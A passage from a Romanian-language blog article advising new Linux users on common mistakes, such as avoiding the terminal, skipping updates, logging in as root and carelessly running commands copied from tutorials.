sunt distributii bune, ba din contra, sunt foarte bune dar nu sunt adresate incepatorilor. Nu sunt distributii populare asta insemnand ca nu veti gasi articole ajutatoare sau discutii despre acestea pe net in cazul in care o sa va loviti de o problema. Pentru incepatori cele mai recomandate distributii sunt Linux Mint, Ubuntu sau PinguyOS, in general distributiile bazate pe Debian sunt cele mai usoare. Aici castiga Linuxul, ofera libertatea fiecarui individ de a alege distributia preferata. Zilnic iau nastere distributii noi bazate pe nevoi si medii de lucru. domenii de activitate. Spre exemplu, exista o distributie numita Ubuntu Studio, o distributie ce vine cu o gramada de softuri dedicate celor ce se ocupa de editarea audio, video sau foto. O alta distributie ar fi Edubuntu, ideala pentru profesori, cadre didactice etc. Si lista poate continua in functie de activitatea pe care o aveti. 4. Sa nu gasiti softuri pentru Linux Cand am instalat prima data Linux, prima directie a fost sa merg pe site-uri de download si sa descarc softuri asa cum faceam si in Windows. Nu este nevoie sa mergeti pe site-uri sa descarcati softuri, asta pentru inceput. Pe Linux, softurile vin la voi. Fiecare distributie are inclusa un manager de pachete. Pe Ubuntu Linux softurile se instaleaza in cu totul alt mod decat pe Windows si aici trebuie neaparat sa repet avertismentul: LINUX NU E WINDOWS ! 5. Sa trimiteti documente facute si salvate in formatul default Open Office celor ce folosesc Microsoft Office. Iarasi este o mare greseala. Cand editati un document sau creati un nou document in Open Office, in momentul in care ati salvat documentul, Open Office il va salva in formatul sau default. va trebui sa alegeti “Save as…” pentru a avea posibilitatea sa schimbati extensia/formatul documentului in cel compatibil pentru Microsoft Office. Tot vad pe forumuri indivizi (chiar si pe forumul ubuntu.ro, autointitulat reprezentant oficial al Ubuntu Romania) care in loc sa fie clari cu userii ii iluzioneaza bagandu-le pe gat noilor useri ca Open Office e la fel ca Microsoft Office, ca e gratuit, ca nu vor mai avea niciodata nevoie de Microsoft Office. TOTAL GRESIT Open Office nu poate inlocui Microsoft Office. Open Office este doar o alternativa la celelalte procesoare de text existente pe piata. O sa mai aveti nevoie de Microsoft Office mai ales daca sunteti student. Chiar daca o sa salvati documentele din Open Office intr-un format compatibil suportat de Microsoft Office, fisierele facute in Open Office si deschise cu Microsoft Office nu se vor afisa la fel, de multe ori o sa observati ca se vor afisa total aiurea, va trebui sa il rearanjati. 6. Sa evitati linia de comanda, Terminalul Asa cum am spus si in cele 3 tutoriale realizate de mine pe tema “introducere in terminal” multi gresesc incercand sa evite folosirea terminalului. Daca veti privi serialul dedicat Terminalului, o sa va convingeti ca nu este deloc greu si imposibil asa cum probabil va imaginati. Terminalul ne ajuta enorm de mult si ne salveaza timp pretios. Nu este deloc greu daca avem rabdare sa citim putin despre acesta, despre ce putem face cu el. La urma urmei nimeni nu sa nascut invatat si haideti sa ne gandim cati din cei ce utilizeaza windowsul stiau sau stiu sa-l foloseasca cu adevarat? Chiar si sa folosesti windowsul a trebuit sa inveti la un moment dat, nu? Nu vad sensul unor tipi care argumenteaza “aaa terminalul e greu, trebuie sa il inveti, sa stii comenzile” Corect, dar Windowsul l-ai stiut de cand ai pus mana pe calculator? nu cumva l-ai invatat in timp lovindu-te zi de zi, de una, de alta? Totul se invata, trebuie doar rabdare si sa va placa sa cititi. 7. Sa va dati batuti prea repede Dupa cateva ore si uneori dupa cateva zile, multi se dau batuti prea usor si asta pentru faptul ca nu citesc documentatia sistemului inainte sa il foloseasca. Au falsa impresie ca e doar un sistem de operare si ca tot ce stiu ei in Windows se aplica si pe Linux. Daca nu va iese ceva, daca intampinati probleme, singurul vinovat de aceste lucruri este doar cel ce se loveste de ele, cel ce se afla in fata pc-ului. Pe ubuntu.ro exista o intreaga documentatie despre sistemul de operare Ubuntu scrisa in limba romana. Toate distributiile au materiale informative sau manuale de folosire fie pe site-ul propriu fie pe wikipedia fie un manual in format pdf descarcabil. Fiti rationali si ganditi logic. Nu aveti cum sa pilotati un avion fara sa faceti scoala de instructaj cum nu aveti cum sa folositi un sistem de operare pana nu cititi bazele acestuia si macar capitolele principale dedicate noilor utilizatori. Nu mai fugiti de informatie, nu mai fugiti de citit!!! Si cand utilizati windows si intampinati greutati mergeti pe google si cautati rezolvari, cititi forumuri. La fel procedati si pentru cazul in care folositi Ubuntu Linux sau oricare alta distributie. Majoritatea distributiilor au forum dedicat pentru suport insa nu o sa fiti ajutati daca faceti abuz de bunatatea acestora si nu cititi documentatia sistemului de operare. 8. Sa credeti ca erarhia fisierelor si folderelor din Windows e la fel si pe Linux. Nu exista sintaxa “C:\” in Ubuntu Linux sau oricare alta distributie. Nu exista partitia C sau D sau E, nu exista Programs Files, nu exista Registry Editor, si absolut nimic din ce cunoasteti din Windows. Ubuntu si alte distributii Linux in general au o cutotul alta erarhie a fisierelor. Pentru a intelege mai bine acest aspect o sa fac in viitorul apropiat fie un articol fie un videotutorial legat de asta. 9. Sa amanati update-urile de sistem. Cum majoritatea utilizatorilor de Windows folosesc versiunea piratata a acestui sistem de operare, acestia au deja in reflex ca primul lucru pe care il fac dupa ce isi instaleaza windowsul, se duc sa dezactiveze Automatic Updates. Acest lucru nu este valabil si in cazul in care folositi Linux, indiferent ce distributie. Ubuntu Linux si celelalte distributii sunt sisteme de operare open source ce nu au nevoie de cheie de licenta la instalare. Toate softurile folosite de acest sisteme de operare sunt gratuite si tot odata open source. Updatarea sistemului fiind chiar vitala in cazul folosirii acestui sistem de operare. Prin update sistemul isi ia unele fix-uri pentru eventualele brese de securitate, isi imbunataseste unele module, isi updateaza softurile folosite, repara unele probleme, aduce noi functii si il face mai stabil. Nu exista nici un motiv pentru care sa fugiti de update-uri. 10. Sa va logati ca root. Pe Ubuntu si celelalte distributii userul root este userul suprem ce are toate privilegiile necesare pentru a face orice doriti in sistemul de operare. Toate distributiile Linux in momentul instalarii va crea userul root si un al 2-lea user al vostru pe care va trebui sa il folositi de zi cu zi. Apelati la root si folositi-l doar in cazuri extreme si doar atunci cand altfel nu puteti sa faceti lucrurile sa mearga decat cu privilegii de root. Inca o cauza pentru care Linuxul este atat de sigur este crearea unui user limitat la instalare asta insemnand ca nu puteti sa va faceti rau avand drepturi limitate asupra sistemului. Pentru a folosi drepturile root ca sa indepliniti anumite task-uri ce nu pot fi facute de userul obisnuit, folositi comanda su sau sudo insa nu va logati niciodata ca root. 11. Sa va pierdeti ferestrele in celelalte Desktopuri virtuale. Un mare plus al sistemului de operare Ubuntu este posibilitatea de a lucra pe mai multe desktopuri virtuale. multi insa nu inteleg adevaratul rol al acestui “bonus” si deseori isi pierd ferestrele pe celelalte Desktopuri crezand ca aplicatia respectiva, deschisa defapt pe alt desktop, insa ne prezenta in cel curent, a facut crash sau nu e buna. Fiti intotdeauna atenti unde dati click si priviti mereu indicatorul de langa cosul de gunoi situat in panoul de jos, partea dreapta, pentru a sti unde va aflati si pe ce Desktop lucrati. By default ubuntu Linux va seteaza 4 Desktopuri (spatii de lucru) virtule avand astfel posibilitatea sa va manageriati si sa va organizati intr-un mod mai usor munca la PC 12. Sa ignorati securitatea doar pentru ca folositi Linux. Chiar daca e Linux, riscuri exista in orice sistem de operare, doar ca aici sunt mai putine sau foarte putine insa asta nu inseamna sa cadem in extrema cealalta numita ignoranta. Cititi cu atentie si cereti opinia unui cunoscator inainte sa executati comenzile citite pe unele site-uri in diferite tutoriale text sau video. Cititi mereu comentariile de la acel articol/tutorial pentru a afla si opiniile celorlalti vizitatori, astfel va puteti da seama daca indrumarile autorului sunt corecte sau menite sa va faca rau. Siguranta e cruciala indiferent ca folositi Linux, Mac OS X sau Windows Acestea sunt cele mai intalnite greseli la noii utilizatori ce vor sa utilizeze Linux. Multi cad prada acestor greseli dar voi le putetii evita daca ati citit acest articol pana la capat. Ajuta si pe altii sa le evite spunandu-le despre acest articol si indrumandu-i sa il citeasca. Fiti calmi, cititi, documentati-va si cel mai important, aveti rabdare!! Va astept pe rubrica de comentarii a acestui articol cu parerile voastre si cu lucrurile despre care ati dori sa scriu pe acest site dedicat Linuxului.
×
×
  • Create New...